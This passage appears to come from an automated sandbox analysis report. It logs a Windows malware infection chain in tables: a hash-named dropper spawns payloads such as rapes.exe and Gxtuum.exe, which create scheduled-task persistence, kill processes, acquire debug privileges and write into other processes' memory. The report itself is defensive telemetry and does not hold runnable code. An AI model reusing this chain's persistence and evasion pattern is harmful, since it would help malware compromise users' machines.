File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A
File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\nrwu\epug.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108990101\zY9sqWs.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2020 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe
PID 2020 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe
PID 2020 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe
PID 1956 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1956 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1956 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2232 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
PID 2232 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
PID 2232 wrote to memory of 4040 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2232 wrote to memory of 4040 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 4040 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 4124 wrote to memory of 2408 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4124 wrote to memory of 2408 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2232 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2232 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 752 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 752 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 752 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2232 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe
PID 2232 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe
PID 2232 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe
PID 1636 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe C:\Windows\SysWOW64\cmd.exe
